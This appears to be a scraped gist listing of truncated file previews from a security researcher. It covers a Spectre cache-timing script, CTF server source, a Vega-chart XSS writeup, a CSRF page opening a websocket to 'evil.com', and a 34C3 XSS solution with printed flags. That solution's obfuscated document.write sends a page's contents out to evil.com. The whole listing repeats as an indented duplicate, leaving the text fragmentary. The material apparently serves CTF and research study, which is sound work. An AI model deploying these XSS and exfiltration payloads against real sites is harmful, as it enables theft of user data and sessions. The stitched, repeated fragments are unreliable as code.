Pepe Vila cgvwzq

## 14.plist.json
/* plutil -convert json -o - /usr/share/kpep/a14.plist */
{"name":"a14","system":{"cpu":{"config_counters":1020,"marketing_name":"Apple A14","fixed_counters":3,"aliases":{"Instructions":"FIXED_INSTRUCTIONS","MispredictedBranches":"BRANCH_MISPREDICT","Branches":"INST_BRANCH","FPInstructions":"INST_NEON_OR_FP","TLBInstructionMisses":"ITLB_MISS","MMUFaults":"MMU_MISS","ALUInstructions":"INST_INTEGER","L1DataCacheStoreMisses":"DCACHE_STORE_MISS","Cycles":"FIXED_CYCLES","TLBDataMisses":"DTLB_MISS","L1DataCacheLoadMisses":"DCACHE_LOAD_MISS","L1DataCacheAccesses":"INST_LDST"},"events":{"MEMORY_ORDER_VIOLATION":{"counters_mask":224,"number":196,"description":"Incorrect speculation between store and dependent load"},"ATOMIC_OR_EXCLUSIVE_SUCCESS":{"number":179,"description":"Atomic or exclusive instruction successfully completed"},"ICACHE_MISS":{"number":211,"description":"Instruction cache demand misses"},"INST_ALL":{"counters_mask":128,"number":140,"description":"All Instructions"},"INST_LDST":{"counters_mask":128,"n

## spectre.js
const PAGE_SZ = 4096;
const CACHE_LINE_SZ = 64;
const CACHE_LINES_PER_PAGE = PAGE_SZ/CACHE_LINE_SZ;
const CACHE_WAYS = 8;
const MEM_PAGES = 8192;
const WASM = false;

class Utils {
	sort(arr) {
		for (let i = 0; i < arr.length; i++) {

## writeup.txt
### Pwn!
```vega
{
  "data": {
    "values": [{}]
  },
  "transform": [
    {"filter": "(0//1/)-'\\\n,eval(payload.dataset.x))))//'"}
  ],
  "mark": "bar"

## source.js
const fs = require('fs');
const express = require('express');
const session = require('express-session')
const cookieParser = require('cookie-parser');
const { URL } = require('url');
const uuidv4 = require('uuid/v4');
const path = require('path');
const bot = require('./bot');
const crypto = require('crypto');
const mariadb = require('mariadb');

## js-lower-alpha-parent-dot.html
<style>
textarea {
	width: 100%;
	height: 30%;
}
</style>
<textarea id="input">alert('xss')</textarea>
<textarea id="output"></textarea>
<br>
<label>Length: </label><span id="numchars"></span>

## output.log
[+] Server is listening on 5001
...pre-payoad:
...post-payoad:
...pre-payoad: d
...post-payoad: 3
...pre-payoad: d3
...post-payoad: d3
...pre-payoad: d3a
...post-payoad: 0d3
...pre-payoad: d3ad

## index.html
<!doctype html>
<meta charset=utf-8>
<script>
(function(){
	let p = '66756e6374696f6e20776f6c6f6c6f2829207b0a2f2a2070616464696e6770616464696e6770616464696e6770616464696e202a2f0a6c65742078203d205b60a93b8c71cd270612671823b651adad9cdb3cd1d746c54f2911be40d107cc15e790e1a8be804d36484bcee114fe8f137bb71fb709c1a16d399884facf5936714b1fe4c9be4e2ec593c1df6e22d6ee0fc42198160b689c02f9a9c300c89b5f68c8d33530f89fc8721efb41cc3adc73008702d7c7373b70cbb75ae7575a6f7df566602c2f2a666a35374e4762304954714678656e6c6f374644766e41775a47464e346f6e4538535274443134766e3564776d79424b546d56496c6c4c706b4d2a2f6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005752ca3581b494dd996d5ddeab432a3bfb53bbcdb05dd34401241f1cf273e3c9812ecd67c66f2fb8f046e3cc1f5787921df10fc8423f626c6bef6f09947df69992d2ba0431422fbcc26dcdd16e4b6cbf198c3a5b12fa72b066932264a9afdbc8da7ba363f8ea1c70267c50992d0c9dee41000116dc523f4e61c37e208a9cf34602c2f2a39697a366c534166596d46786a48446e375246446e353875544

## index.html
<body>
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
    // change admin's email
    <input type="text" name="email" value="wololo@coolmail.com">
    <input type="text" name="csrf" value="">
    <input type="text" name="change" value="Modify profile">
</form>
<iframe id="leakchar"></iframe>
<script>
const WS = "ws://evil.com:8000";

## solution.html
XSS vector:
<link id=foo rel=import href=/flag(1|2)>
<script src="/feed?type=jsonp&cb=payload"></script>

<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
<script>
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
</script>

<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->
	const PAGE_SZ = 4096;
	const CACHE_LINE_SZ = 64;
	const CACHE_LINES_PER_PAGE = PAGE_SZ/CACHE_LINE_SZ;
	const CACHE_WAYS = 8;
	const MEM_PAGES = 8192;
	const WASM = false;

	class Utils {
	sort(arr) {
	for (let i = 0; i < arr.length; i++) {
	### Pwn!
	```vega
	{
	"data": {
	"values": [{}]
	},
	"transform": [
	{"filter": "(0//1/)-'\\\n,eval(payload.dataset.x))))//'"}
	],
	"mark": "bar"
	const fs = require('fs');
	const express = require('express');
	const session = require('express-session')
	const cookieParser = require('cookie-parser');
	const { URL } = require('url');
	const uuidv4 = require('uuid/v4');
	const path = require('path');
	const bot = require('./bot');
	const crypto = require('crypto');
	const mariadb = require('mariadb');
	<style>
	textarea {
	width: 100%;
	height: 30%;
	}
	</style>
	<textarea id="input">alert('xss')</textarea>
	<textarea id="output"></textarea>
	<br>
	<label>Length: </label><span id="numchars"></span>
	[+] Server is listening on 5001
	...pre-payoad:
	...post-payoad:
	...pre-payoad: d
	...post-payoad: 3
	...pre-payoad: d3
	...post-payoad: d3
	...pre-payoad: d3a
	...post-payoad: 0d3
	...pre-payoad: d3ad
	<!doctype html>
	<meta charset=utf-8>
	<script>
	(function(){
	let p = '66756e6374696f6e20776f6c6f6c6f2829207b0a2f2a2070616464696e6770616464696e6770616464696e6770616464696e202a2f0a6c65742078203d205b60a93b8c71cd270612671823b651adad9cdb3cd1d746c54f2911be40d107cc15e790e1a8be804d36484bcee114fe8f137bb71fb709c1a16d399884facf5936714b1fe4c9be4e2ec593c1df6e22d6ee0fc42198160b689c02f9a9c300c89b5f68c8d33530f89fc8721efb41cc3adc73008702d7c7373b70cbb75ae7575a6f7df566602c2f2a666a35374e4762304954714678656e6c6f374644766e41775a47464e346f6e4538535274443134766e3564776d79424b546d56496c6c4c706b4d2a2f6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005752ca3581b494dd996d5ddeab432a3bfb53bbcdb05dd34401241f1cf273e3c9812ecd67c66f2fb8f046e3cc1f5787921df10fc8423f626c6bef6f09947df69992d2ba0431422fbcc26dcdd16e4b6cbf198c3a5b12fa72b066932264a9afdbc8da7ba363f8ea1c70267c50992d0c9dee41000116dc523f4e61c37e208a9cf34602c2f2a39697a366c534166596d46786a48446e375246446e353875544
	<body>
	<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
	// change admin's email
	<input type="text" name="email" value="wololo@coolmail.com">
	<input type="text" name="csrf" value="">
	<input type="text" name="change" value="Modify profile">
	</form>
	<iframe id="leakchar"></iframe>
	<script>
	const WS = "ws://evil.com:8000";
	XSS vector:
	<link id=foo rel=import href=/flag(1\|2)>
	<script src="/feed?type=jsonp&cb=payload"></script>

	<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
	<script>
	document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
	</script>

	<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->